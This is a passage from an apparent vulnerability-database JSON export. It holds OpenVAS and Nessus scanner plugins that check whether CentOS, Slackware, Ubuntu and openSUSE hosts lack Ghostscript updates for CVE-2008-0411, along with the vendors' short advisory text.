System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ghostscript is a program for displaying PostScript files, or printing them\n to non-PostScript printers.\n\n Chris Evans from the Google Security Team reported a stack-based buffer\n overflow flaw in Ghostscript's zseticcspace() function. An attacker could\n create a malicious PostScript file that would cause Ghostscript to execute\n arbitrary code when opened. (CVE-2008-0411)\n \n These updated packages also fix a bug, which prevented the pxlmono printer\n driver from producing valid output on Red Hat Enterprise Linux 4.\n \n All users of ghostscript are advised to upgrade to these updated packages,\n which contain a backported patch to resolve these issues.\";\n\ntag_affected = \"ghostscript on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-February/014730.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880187\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:36:45 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0155\");\n script_cve_id(\"CVE-2008-0411\");\n script_name( \"CentOS Update for ghostscript CESA-2008:0155 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of ghostscript\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript\", rpm:\"ghostscript~7.07~33.2.el4_6.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-devel\", rpm:\"ghostscript-devel~7.07~33.2.el4_6.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-gtk\", rpm:\"ghostscript-gtk~7.07~33.2.el4_6.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2008-062-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:60522", "href": "http://plugins.openvas.org/nasl.php?oid=60522", "type": "openvas", "title": "Slackware Advisory SSA:2008-062-01 espgs/ghostscript", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2008_062_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New espgs or ghostscript packages are available for 11.0, 12.0, and -current\nto fix a buffer overflow.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2008-062-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2008-062-01\";\n \nif(description)\n{\n script_id(60522);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2008-0411\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2008-062-01 espgs/ghostscript \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"espgs\", ver:\"8.15.3svn185-i486-3_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"espgs\", ver:\"8.15.4-i486-3_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:28:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-599-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "id": "OPENVAS:840317", "href": "http://plugins.openvas.org/nasl.php?oid=840317", "type": "openvas", "title": "Ubuntu Update for ghostscript, gs-esp, gs-gpl vulnerability USN-599-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_599_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for ghostscript, gs-esp, gs-gpl vulnerability USN-599-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Chris Evans discovered that Ghostscript contained a buffer overflow in\n its color space handling code. If a user or automated system were\n tricked into opening a crafted Postscript file, an attacker could cause\n a denial of service or execute arbitrary code with privileges of the\n user invoking the program. (CVE-2008-0411)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-599-1\";\ntag_affected = \"ghostscript, gs-esp, gs-gpl vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 6.10 ,\n Ubuntu 7.04 ,\n Ubuntu 7.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-599-1/\");\n script_id(840317);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"599-1\");\n script_cve_id(\"CVE-2008-0411\");\n script_name( \"Ubuntu Update for ghostscript, gs-esp, gs-gpl vulnerability USN-599-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU7.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"gs-esp-x\", ver:\"8.15.4.dfsg.1-0ubuntu1.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.15.4.dfsg.1-0ubuntu1.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgs-esp-dev\", ver:\"8.15.4.dfsg.1-0ubuntu1.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgs-esp8\", ver:\"8.15.4.dfsg.1-0ubuntu1.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.54.dfsg.1-5ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.54.dfsg.1-5ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.15.2.dfsg.0ubuntu1-0ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.15-4ubuntu3.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.15-4ubuntu3.1\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.15.2.dfsg.0ubuntu1-0ubuntu4.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgs-esp-dev\", ver:\"8.15.2.dfsg.0ubuntu1-0ubuntu4.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgs-esp8\", ver:\"8.15.2.dfsg.0ubuntu1-0ubuntu4.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.50-1.1ubuntu1.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.50-1.1ubuntu1.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ghostscript-x\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ghostscript\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgs-dev\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgs8\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ghostscript-doc\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gs-esp-x\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgs-esp-dev\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gs-aladdin\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gs-common\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-17T14:44:13", "description": "A stackbased buffer overflow was fixed in the ghostscript interpreter,\nwhich potentially could be used to execute code or at least crash\nghostscript. (CVE-2008-0411)", "edition": 23, "published": "2008-02-29T00:00:00", "title": "openSUSE 10 Security Update : ghostscript-fonts-other (ghostscript-fonts-other-4985)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "modified": "2008-02-29T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ghostscript-library", "p-cpe:/a:novell:opensuse:ghostscript-x11", "cpe:/o:novell:opensuse:10.3", "cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:ghostscript-fonts-other", "p-cpe:/a:novell:opensuse:ghostscript-omni", "p-cpe:/a:novell:opensuse:ghostscript-ijs-devel", "p-cpe:/a:novell:opensuse:libgimpprint-devel", "p-cpe:/a:novell:opensuse:libgimpprint", "p-cpe:/a:novell:opensuse:ghostscript-fonts-rus", "cpe:/o:novell:opensuse:10.1", "p-cpe:/a:novell:opensuse:ghostscript-fonts-std"], "id": "SUSE_GHOSTSCRIPT-FONTS-OTHER-4985.NASL", "href": "https://www.tenable.com/plugins/nessus/31322", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update ghostscript-fonts-other-4985.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31322);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0411\");\n\n script_name(english:\"openSUSE 10 Security Update : ghostscript-fonts-other (ghostscript-fonts-other-4985)\");\n script_summary(english:\"Check for the ghostscript-fonts-other-4985 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A stackbased buffer overflow was fixed in the ghostscript interpreter,\nwhich potentially could be used to execute code or at least crash\nghostscript. (CVE-2008-0411)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ghostscript-fonts-other packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-fonts-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-fonts-rus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-fonts-std\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-ijs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-library\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-omni\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgimpprint\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgimpprint-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/02/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1|SUSE10\\.2|SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1 / 10.2 / 10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"ghostscript-fonts-other-8.15.3-18.13\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"ghostscript-fonts-rus-8.15.3-18.13\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"ghostscript-fonts-std-8.15.3-18.13\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"ghostscript-library-8.15.3-18.13\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"ghostscript-omni-8.15.3-18.13\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"ghostscript-x11-8.15.3-18.13\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"libgimpprint-4.2.7-62.13.6\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"libgimpprint-devel-4.2.7-62.14.6\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"ghostscript-fonts-other-8.15.3-26\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"ghostscript-fonts-rus-8.15.3-26\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"ghostscript-fonts-std-8.15.3-26\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"ghostscript-library-8.15.3-26\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"ghostscript-omni-8.15.3-26\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"ghostscript-x11-8.15.3-26\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"libgimpprint-4.2.7-103\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"libgimpprint-devel-4.2.7-103\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"ghostscript-fonts-other-8.15.4-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"ghostscript-fonts-rus-8.15.4-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"ghostscript-fonts-std-8.15.4-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"ghostscript-ijs-devel-8.15.4-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"ghostscript-library-8.15.4-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"ghostscript-omni-8.15.4-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"ghostscript-x11-8.15.4-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"libgimpprint-4.2.7-178.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"libgimpprint-devel-4.2.7-178.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript-library\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:25:17", "description": "Updated ghostscript packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nGhostscript is a program for displaying PostScript files, or printing\nthem to non-PostScript printers.\n\nChris Evans from the Google Security Team reported a stack-based\nbuffer overflow flaw in Ghostscript's zseticcspace() function. An\nattacker could create a malicious PostScript file that would cause\nGhostscript to execute arbitrary code when opened. (CVE-2008-0411)\n\nThese updated packages also fix a bug, which prevented the pxlmono\nprinter driver from producing valid output on Red Hat Enterprise Linux\n4.\n\nAll users of ghostscript are advised to upgrade to these updated\npackages, which contain a backported patch to resolve these issues.", "edition": 27, "published": "2008-02-28T00:00:00", "title": "CentOS 3 / 4 / 5 : ghostscript (CESA-2008:0155)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "modified": "2008-02-28T00:00:00", "cpe": ["cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:ghostscript-gtk", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:hpijs", "p-cpe:/a:centos:centos:ghostscript-devel", "cpe:/o:centos:centos:3", "p-cpe:/a:centos:centos:ghostscript"], "id": "CENTOS_RHSA-2008-0155.NASL", "href": "https://www.tenable.com/plugins/nessus/31302", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0155 and \n# CentOS Errata and Security Advisory 2008:0155 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31302);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-0411\");\n script_bugtraq_id(28017);\n script_xref(name:\"RHSA\", value:\"2008:0155\");\n\n script_name(english:\"CentOS 3 / 4 / 5 : ghostscript (CESA-2008:0155)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ghostscript packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nGhostscript is a program for displaying PostScript files, or printing\nthem to non-PostScript printers.\n\nChris Evans from the Google Security Team reported a stack-based\nbuffer overflow flaw in Ghostscript's zseticcspace() function. An\nattacker could create a malicious PostScript file that would cause\nGhostscript to execute arbitrary code when opened. (CVE-2008-0411)\n\nThese updated packages also fix a bug, which prevented the pxlmono\nprinter driver from producing valid output on Red Hat Enterprise Linux\n4.\n\nAll users of ghostscript are advised to upgrade to these updated\npackages, which contain a backported patch to resolve these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-February/014716.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?76de8ee6\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-February/014717.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?298a9a51\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-February/014720.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f80a7157\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-February/014721.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a0fc12bd\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-February/014730.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4e8f440a\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-February/014731.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?be2f0ec4\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-March/014740.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c8cedd03\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-March/014741.html\n script_set_attribute(\n attribute:\"see_also\",\n 